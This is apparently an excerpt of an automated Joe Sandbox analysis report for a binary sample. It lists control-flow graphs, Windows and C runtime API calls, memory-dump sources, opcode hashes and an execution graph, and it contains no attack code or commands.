                                                                                                                                                                            • Opcode ID: 09b2f055cfc595bf1c4eca6e50dd55ce36cc69e8056fedc5982f57b532c327a5
                                                                                                                                                                            • Instruction ID: 1e0c498cb521422b72a9bc3767318ae4809beb3443964829cebe031783339755
                                                                                                                                                                            • Opcode Fuzzy Hash: 09b2f055cfc595bf1c4eca6e50dd55ce36cc69e8056fedc5982f57b532c327a5
                                                                                                                                                                            • Instruction Fuzzy Hash: B521E5B59003099FDB10CF9AD884ADEFBF8EB48310F14801AE958A3351D374A954DFA5

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 102 103d5f9-103d694 DuplicateHandle 103 103d696-103d69c 102->103 104 103d69d-103d6ba 102->104 103->104
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0103D5C6,?,?,?,?,?), ref: 0103D687
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                            • Opcode ID: 804d6aa061319465f060d025bec44ca747108389531e7a1fdfafaf90130edf0f
                                                                                                                                                                            • Instruction ID: c6c36cf6c5197cf15e5967a4aed98236e626aa501323300f75bdfd8f19a752f6
                                                                                                                                                                            • Opcode Fuzzy Hash: 804d6aa061319465f060d025bec44ca747108389531e7a1fdfafaf90130edf0f
                                                                                                                                                                            • Instruction Fuzzy Hash: 3721E5B59002099FDB10CFAAD584ADEBFF4EB48310F14841AE958A3351D3749944CFA1

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 107 103af18-103af58 108 103af60-103af8b GetModuleHandleW 107->108 109 103af5a-103af5d 107->109 110 103af94-103afa8 108->110 111 103af8d-103af93 108->111 109->108 111->110
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0103AF7E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                            • Opcode ID: eb13d7eb9f41eb6cf18812e52a9f5459e2c7f3ad818d2c55f40a04b714876a48
                                                                                                                                                                            • Instruction ID: 543934543508b9d2a1d85fee946ec06a3405f29c1dcddc3453193f0105700510
                                                                                                                                                                            • Opcode Fuzzy Hash: eb13d7eb9f41eb6cf18812e52a9f5459e2c7f3ad818d2c55f40a04b714876a48
                                                                                                                                                                            • Instruction Fuzzy Hash: 30110FB5D007498FDB14CF9AC444B9EFBF8EB88224F20841AD558A7250C379A545CFA1

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 916 9d30012-9d30060 918 9d30200-9d3020d 916->918 919 9d30066-9d30077 916->919 920 9d30079 919->920 921 9d3007e-9d30094 919->921 920->921 924 9d301cb-9d301e6 921->924 925 9d3009a-9d300a5 921->925 928 9d301ed-9d301f3 924->928 926 9d300ab-9d300c6 925->926 927 9d301e8 925->927 931 9d30191-9d30199 926->931 932 9d300cc-9d300d2 926->932 927->928 929 9d301f5 928->929 930 9d301fd 928->930 929->930 930->918 931->927 934 9d3019b-9d301ae 931->934 932->931 933 9d300d8-9d30134 932->933 938 9d3013e-9d30147 933->938 934->927 935 9d301b0-9d301c5 934->935 935->924 935->925 939 9d3014e-9d30153 938->939 940 9d30155-9d3015f 939->940 941 9d30189 939->941 943 9d30161-9d30167 940->943 944 9d30177-9d3017b 940->944 941->931 945 9d3016b-9d3016d 943->945 946 9d30169 943->946 944->941 947 9d3017d-9d3017f 944->947 945->944 946->944 947->941
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: e9cd74df8f3a1b96c82100c5db37d0bf7c3c9bbe5b64a64922b0ccdafe37f988
                                                                                                                                                                            • Instruction ID: 28108cf0d28c45822581a84a549d6d212e6b0d23acbbdfab0b1d21bf5b434290
                                                                                                                                                                            • Opcode Fuzzy Hash: e9cd74df8f3a1b96c82100c5db37d0bf7c3c9bbe5b64a64922b0ccdafe37f988
                                                                                                                                                                            • Instruction Fuzzy Hash: F851F371E412049FDB15DF69CC80A9EB7F2EF8A311F95C159E404EB2A0DB70AD46CB60
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 70cbd5430a90ea2bfa952ca1523da1165f43fc7dd5cf9e63944918366a442c48
                                                                                                                                                                            • Instruction ID: 7ce10c13e622e68970c86a30971e7be13b4aa4ecff3da33f847bf4c358ceb659
                                                                                                                                                                            • Opcode Fuzzy Hash: 70cbd5430a90ea2bfa952ca1523da1165f43fc7dd5cf9e63944918366a442c48
                                                                                                                                                                            • Instruction Fuzzy Hash: 6751D471E002049FDB14DFAAD884AAEB7F6FF89311F95C129E504EB294DB70AD41CB50
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1993977790.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_fed000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f3953e8421990835e2a20251a6da7f8432d46449d2836cbbb2430d00abd96a83
                                                                                                                                                                            • Instruction ID: 0935721f4b75c0e5e7582ed8fd97a749d2a41bd9e692713ccf9713c4a1a6ea02
                                                                                                                                                                            • Opcode Fuzzy Hash: f3953e8421990835e2a20251a6da7f8432d46449d2836cbbb2430d00abd96a83
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D212276604380DFDB14DF10D884B16BB61FB84324F28C56DDA0A0BA8AC33AD807DA62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1993977790.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_fed000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 542c5d06e19bb4a44516f7046786f0591985aaf536e6e7fdd2fad31f337bcbf0
                                                                                                                                                                            • Instruction ID: 1c4a4e770d730b9d00beace1b5aba368305b4be1600dceb072c9f44a3fa5eea7
                                                                                                                                                                            • Opcode Fuzzy Hash: 542c5d06e19bb4a44516f7046786f0591985aaf536e6e7fdd2fad31f337bcbf0
                                                                                                                                                                            • Instruction Fuzzy Hash: 81216B75A04384DFDB04DF11D9C0B15BB61FB84324F20C56DD9094B782C336D806EB62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1993977790.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_fed000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: a82da95d09e4912410e090c10461564908e6a905ba14312e82dd79f66c1aae17
                                                                                                                                                                            • Instruction ID: c05d78c351e3cd1a364aa581954703aeb6e53c59fb33d70b976f745115f2a00a
                                                                                                                                                                            • Opcode Fuzzy Hash: a82da95d09e4912410e090c10461564908e6a905ba14312e82dd79f66c1aae17
                                                                                                                                                                            • Instruction Fuzzy Hash: EE216F755093C08FCB12CF24D994715BF71EB46324F28C5EAD9498F6A7C33A980ACB62
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1993977790.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_fed000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                                                                            • Instruction ID: a9ec4af6571d9528eb290f4dab4aa3958f87cf30274e891100133b74de335b12
                                                                                                                                                                            • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                                                                                                            • Instruction Fuzzy Hash: 6211DD79904280DFCB05CF10C9C0B15FBB2FB84324F24C6ADD9494B696C33AD80ADB61
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1993877123.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_fdd000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c411dead093924799beefd2555a758610a519d90dc3b945168fb324c204be28d
                                                                                                                                                                            • Instruction ID: 5523ccf3cbb270e3af4eb05fefababf796a46034bf3b443cb05f448c54398568
                                                                                                                                                                            • Opcode Fuzzy Hash: c411dead093924799beefd2555a758610a519d90dc3b945168fb324c204be28d
                                                                                                                                                                            • Instruction Fuzzy Hash: 36018F714043489BE7109A65C884B66BF99EF81775F28C51AED4D4A382C769D840DAF2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d3cc9aa69a75aebb105a88887907b700c7b96773227d937ef1facf77a292484c
                                                                                                                                                                            • Instruction ID: 6f303cfea03039ad18a42e8d9f3243aa720cacf4d0beabcee21b2a6f9d0c238d
                                                                                                                                                                            • Opcode Fuzzy Hash: d3cc9aa69a75aebb105a88887907b700c7b96773227d937ef1facf77a292484c
                                                                                                                                                                            • Instruction Fuzzy Hash: 530149352493868FC302AF68D404A967FF5EF86313B44C0AAE4488B232CB36CC0AC760
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1993877123.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_fdd000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: eea0fcf279b9dbe8db96ac4733acacee66b6c47ae897f747f2a27b96948bd943
                                                                                                                                                                            • Instruction ID: ea6390a02b7fdbe13cbe76f8b762c07e8ff575c8329947d145d4b9a2e9f95cc7
                                                                                                                                                                            • Opcode Fuzzy Hash: eea0fcf279b9dbe8db96ac4733acacee66b6c47ae897f747f2a27b96948bd943
                                                                                                                                                                            • Instruction Fuzzy Hash: B8F0A931404344AAE7108A16C888B62FF98EB80734F28C55AED084A282C378A844CAA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 75d3ccd5354177398a1925ed1061c796d56abfc4ad70890d96fdd43f8fba45e9
                                                                                                                                                                            • Instruction ID: ff9af220765c4a0633a0d36337ae0007c6c1a09303601da9b7320e612f150673
                                                                                                                                                                            • Opcode Fuzzy Hash: 75d3ccd5354177398a1925ed1061c796d56abfc4ad70890d96fdd43f8fba45e9
                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF0A03170A7515FE326AB6AAC1046ABBAECEC2612788C8BBE449C7651C925D8028791
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d44e1bd954f9aa0ea9be7df461dbe22c3969de8efad9c528b3b191632dd1f0aa
                                                                                                                                                                            • Instruction ID: 5c1ce3e8808e7a7b399f90b14c7c506c7a807b9a0243ba88faa481a976157705
                                                                                                                                                                            • Opcode Fuzzy Hash: d44e1bd954f9aa0ea9be7df461dbe22c3969de8efad9c528b3b191632dd1f0aa
                                                                                                                                                                            • Instruction Fuzzy Hash: 3BE026323093415FC2226156BC00B977BAEDBC6712F0904AFE1819B781CD26A805C7E1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4ef2db8c1ed843e60f23dc46189d103249f7d4874bf75616b46b002719569970
                                                                                                                                                                            • Instruction ID: 084f0f933b92b348660190845fff133f6e067f0748e7892a33ebead44cf61ee0
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef2db8c1ed843e60f23dc46189d103249f7d4874bf75616b46b002719569970
                                                                                                                                                                            • Instruction Fuzzy Hash: 66D02E3230021593C221118AB800B6BB3AEEBC6A23F04002EE2468B780CE7B9C0583E0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 67be68f652ab6b70e4e0ba03e8677c02656778bb3b85293237abaeece653afd5
                                                                                                                                                                            • Instruction ID: a01843e7e00783326182e3fb32c7c6125a86ef79bca385732d1e8a7b0c5992e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 67be68f652ab6b70e4e0ba03e8677c02656778bb3b85293237abaeece653afd5
                                                                                                                                                                            • Instruction Fuzzy Hash: 57E04FF1D44309ABDB40EFB9C90639EBFF0AB04240F4048AAC400E7605EB748204CF40
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 480471073d79261907ffef308d8cfa03837a5dc650884ec7b630b20df112bc40
                                                                                                                                                                            • Instruction ID: 19d37f9f6bd864437524e7acb225369b3062ab7e205a7833127ca3b1fa59f98d
                                                                                                                                                                            • Opcode Fuzzy Hash: 480471073d79261907ffef308d8cfa03837a5dc650884ec7b630b20df112bc40
                                                                                                                                                                            • Instruction Fuzzy Hash: E1E0C2BA84CB0007D3A88B29E8213A67AD2EF88301F09843FD08AC1294DB3404098A45
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3dd13dca9223dd49dcf4b3c30aeeca3fa7e978eafb06582bee9e3e44e3ca55d9
                                                                                                                                                                            • Instruction ID: c4f1df21102c48d798c5087675fa933819ed3db0574ca79145d6c38fd3988e3f
                                                                                                                                                                            • Opcode Fuzzy Hash: 3dd13dca9223dd49dcf4b3c30aeeca3fa7e978eafb06582bee9e3e44e3ca55d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 60D067B0D8431AEEDB40EFB9C90579EBFF4AB08640F90896AC415E7641EBB452448F91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9585460bee175968007905f5c05b27f5d91b13019e3a0cc8d05253ea6c67fb5b
                                                                                                                                                                            • Instruction ID: f1576299ac0702bc9ef0e62765c7b550396623f4b84ed5d48fa70dcbfa46ddc2
                                                                                                                                                                            • Opcode Fuzzy Hash: 9585460bee175968007905f5c05b27f5d91b13019e3a0cc8d05253ea6c67fb5b
                                                                                                                                                                            • Instruction Fuzzy Hash: B4A17136E002168FCF05DFB4C8949DEBBB6FFC5300B1545AAE901AB265DB71D916CB40

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:0.4%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:0.5%
                                                                                                                                                                            Total number of Nodes:199
                                                                                                                                                                            Total number of Limit Nodes:5
                                                                                                                                                                            execution_graph 52966 7ff79cfcf3d0 52984 7ff79cfb79c0 52966->52984 52970 7ff79cfcf412 52971 7ff79cfb7770 3 API calls 52970->52971 52972 7ff79cfcf422 52971->52972 53035 7ff79cfb7330 cef_string_map_alloc cef_string_map_alloc malloc _CxxThrowException 52972->53035 52974 7ff79cfcf42a 52975 7ff79cfcf48f cef_string_map_alloc 52974->52975 52980 7ff79cfcf42e 52974->52980 53036 7ff79cfcf260 52974->53036 53055 7ff79cfcfaa0 malloc _CxxThrowException new 52975->53055 52978 7ff79cfcf48d 52978->52975 52979 7ff79cfcf43e 52979->52975 52979->52978 52982 7ff79cfcf459 52979->52982 52983 7ff79cfcf46b Sleep 52982->52983 53054 7ff79cfcfaa0 malloc _CxxThrowException new 52982->53054 52983->52978 52983->52979 53056 7ff79cfb2520 52984->53056 52989 7ff79cfb7a75 53091 7ff79cfb37e0 cef_string_map_alloc cef_string_map_alloc malloc _CxxThrowException new 52989->53091 52990 7ff79cfb7ac8 52992 7ff79cfb2520 25 API calls 52990->52992 52991 7ff79cfb7ab3 cef_string_map_alloc 52991->52990 52993 7ff79cfb7ad8 malloc 52992->52993 52995 7ff79cfb5010 3 API calls 52993->52995 52997 7ff79cfb7b3e 52995->52997 52996 7ff79cfb7a9f 52996->52990 52996->52991 52998 7ff79cfb7b73 free 52997->52998 52999 7ff79cfb7b7b 52997->52999 52998->52999 53000 7ff79cfb7ba2 52999->53000 53004 7ff79cfb7bc7 52999->53004 53092 7ff79cfb4ec0 cef_string_map_alloc cef_string_map_alloc malloc _CxxThrowException 53000->53092 53002 7ff79cfb7bbb 53003 7ff79cfb7c32 53002->53003 53005 7ff79cfb7c1d cef_string_map_alloc 53002->53005 53077 7ff79d073d44 53003->53077 53004->53002 53093 7ff79cfb37e0 cef_string_map_alloc cef_string_map_alloc malloc _CxxThrowException new 53004->53093 53005->53003 53009 7ff79cfb2520 25 API calls 53010 7ff79cfb7c9d 53009->53010 53094 7ff79cfb37e0 cef_string_map_alloc cef_string_map_alloc malloc _CxxThrowException new 53010->53094 53011 7ff79cfb7d5e 53013 7ff79cfb7d7f 53011->53013 53016 7ff79cfb7d75 free 53011->53016 53019 7ff79cfb7770 3 API calls 53013->53019 53014 7ff79cfb7d2d 53014->53011 53015 7ff79cfb7d49 cef_string_map_alloc 53014->53015 53015->53011 53016->53013 53018 7ff79cfb7ce5 53095 7ff79cfb22b0 memmove memcpy malloc memcpy free 53018->53095 53023 7ff79cfb7db1 53019->53023 53021 7ff79cfb7d09 53096 7ff79cfb4bb0 malloc cef_string_map_alloc malloc _CxxThrowException 53021->53096 53025 7ff79cfb7e21 53023->53025 53026 7ff79cfb7e18 free 53023->53026 53024 7ff79cfb7d2a 53024->53014 53082 7ff79d073d20 53025->53082 53026->53025 53029 7ff79cfb7770 53030 7ff79cfb778f 53029->53030 53034 7ff79cfb77b0 53029->53034 53031 7ff79d073d44 new 2 API calls 53030->53031 53032 7ff79cfb7799 53031->53032 53032->53034 53102 7ff79cfb5310 memset malloc _CxxThrowException new 53032->53102 53034->52970 53035->52974 53037 7ff79cfcf29d 53036->53037 53107 7ff79cfb18f0 45 API calls 53037->53107 53039 7ff79cfcf2cd 53103 7ff79cfb1890 7 API calls 53039->53103 53041 7ff79cfcf31c 53042 7ff79cfcf331 free 53041->53042 53043 7ff79cfcf33b 53041->53043 53042->53043 53052 7ff79cfcf33f 53043->53052 53104 7ff79d01de70 53043->53104 53045 7ff79cfcf391 free 53046 7ff79cfcf39b 53045->53046 53108 7ff79cfb1840 free free free free 53046->53108 53047 7ff79cfcf355 SetEvent CloseHandle 53047->53052 53049 7ff79cfcf3a4 53051 7ff79d073d20 8 API calls 53049->53051 53053 7ff79cfcf3b4 53051->53053 53052->53045 53052->53046 53053->52979 53054->52982 53055->52980 53057 7ff79cfb25f7 53056->53057 53058 7ff79cfb255f 53056->53058 53059 7ff79d073d20 8 API calls 53057->53059 53097 7ff79cfb3130 12 API calls 53058->53097 53061 7ff79cfb260f malloc 53059->53061 53072 7ff79cfb5010 53061->53072 53062 7ff79cfb2594 53098 7ff79cfb2a90 cef_string_map_alloc malloc _CxxThrowException new 53062->53098 53064 7ff79cfb25a2 53064->53057 53065 7ff79cfb25c3 _invalid_parameter_noinfo_noreturn 53064->53065 53066 7ff79cfb25ca 53064->53066 53065->53066 53067 7ff79cfb25d3 _invalid_parameter_noinfo_noreturn 53066->53067 53068 7ff79cfb25da 53066->53068 53067->53068 53069 7ff79cfb25e3 _invalid_parameter_noinfo_noreturn 53068->53069 53070 7ff79cfb25ea 53068->53070 53069->53070 53070->53057 53071 7ff79cfb25f0 _invalid_parameter_noinfo_noreturn 53070->53071 53071->53057 53073 7ff79cfb50d7 free 53072->53073 53074 7ff79cfb5037 53072->53074 53073->52989 53073->52996 53074->53073 53075 7ff79d073d44 new 2 API calls 53074->53075 53076 7ff79cfb5099 cef_string_map_alloc 53075->53076 53076->53074 53078 7ff79d073d70 malloc 53077->53078 53079 7ff79cfb7c3c 53078->53079 53080 7ff79d073d4f Concurrency::cancel_current_task 53078->53080 53079->53009 53079->53014 53080->53078 53099 7ff79d074ccc _CxxThrowException std::bad_alloc::bad_alloc 53080->53099 53083 7ff79d073d2a 53082->53083 53084 7ff79cfb7e2d SetConsoleCtrlHandler GetModuleHandleW 53083->53084 53085 7ff79d074420 IsProcessorFeaturePresent 53083->53085 53084->53029 53086 7ff79d074437 53085->53086 53100 7ff79d074614 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 53086->53100 53088 7ff79d07444a 53101 7ff79d0743ec SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 53088->53101 53091->52996 53092->53002 53093->53002 53094->53018 53095->53021 53096->53024 53097->53062 53098->53064 53099->53080 53100->53088 53102->53034 53103->53041 53105 7ff79d073d44 new 2 API calls 53104->53105 53106 7ff79d01de9c 53105->53106 53106->53047 53107->53039 53108->53049 53109 7ffbc1b31430 53112 7ffbc1b49d90 53109->53112 53111 7ffbc1b31450 _onexit 53113 7ffbc1b49db3 53112->53113 53116 7ffbc1b4a300 53113->53116 53115 7ffbc1b49e02 53115->53111 53137 7ffbc1b3d0a0 53116->53137 53121 7ffbc1b4a34e 53123 7ffbc1b4a35b 53121->53123 53148 7ffbc1b41ae0 _lock_locales _unlock_locales __int64 53121->53148 53122 7ffbc1b4a36b 53149 7ffbc1b3f050 terminate SwitchToThread SetLastError std::_Throw_Cpp_error 53122->53149 53123->53115 53126 7ffbc1b4a39d 53150 7ffbc1b3b000 22 API calls std::system_error::system_error 53126->53150 53128 7ffbc1b4a3ad _CxxThrowException 53129 7ffbc1b4a3fb 53128->53129 53133 7ffbc1b4a40b 53128->53133 53151 7ffbc1b7caa0 8 API calls 2 library calls 53129->53151 53131 7ffbc1b4a549 53131->53115 53132 7ffbc1b4a48b fputwc 53132->53129 53133->53129 53134 7ffbc1b4a4fe 53133->53134 53135 7ffbc1b4a488 53133->53135 53134->53129 53136 7ffbc1b4a50b fwrite 53134->53136 53135->53129 53135->53132 53136->53129 53152 7ffbc1b3d650 53137->53152 53139 7ffbc1b3d0ea 53166 7ffbc1b7cac4 53139->53166 53142 7ffbc1b3d103 53144 7ffbc1b4ad30 53142->53144 53145 7ffbc1b4ad63 53144->53145 53182 7ffbc1b49bac 53145->53182 53148->53123 53149->53126 53150->53128 53151->53131 53153 7ffbc1b3d663 53152->53153 53154 7ffbc1b3d669 53152->53154 53153->53139 53176 7ffbc1b3f050 terminate SwitchToThread SetLastError std::_Throw_Cpp_error 53154->53176 53156 7ffbc1b3d699 53177 7ffbc1b3b000 22 API calls std::system_error::system_error 53156->53177 53158 7ffbc1b3d6a9 _CxxThrowException 53159 7ffbc1b3d6c0 53158->53159 53159->53139 53160 7ffbc1b3d6ea 53159->53160 53161 7ffbc1b3d6e0 _CxxThrowException 53159->53161 53178 7ffbc1b3f050 terminate SwitchToThread SetLastError std::_Throw_Cpp_error 53160->53178 53161->53160 53163 7ffbc1b3d71a 53179 7ffbc1b3b000 22 API calls std::system_error::system_error 53163->53179 53165 7ffbc1b3d72a _CxxThrowException 53167 7ffbc1b7cade malloc 53166->53167 53168 7ffbc1b7cacf 53167->53168 53169 7ffbc1b3d0f4 53167->53169 53168->53167 53170 7ffbc1b7caee 53168->53170 53169->53142 53175 7ffbc1b48360 11 API calls 4 library calls 53169->53175 53173 7ffbc1b7caf9 53170->53173 53180 7ffbc1b66410 _CxxThrowException std::bad_alloc::bad_alloc 53170->53180 53181 7ffbc1b7d650 _CxxThrowException free std::bad_alloc::bad_alloc 53173->53181 53175->53142 53176->53156 53177->53158 53178->53163 53179->53165 53198 7ffbc1b65920 53182->53198 53184 7ffbc1b49bd1 53185 7ffbc1b65920 __int64 _lock_locales 53184->53185 53191 7ffbc1b49c20 std::locale::_Locimp::_Makeushloc 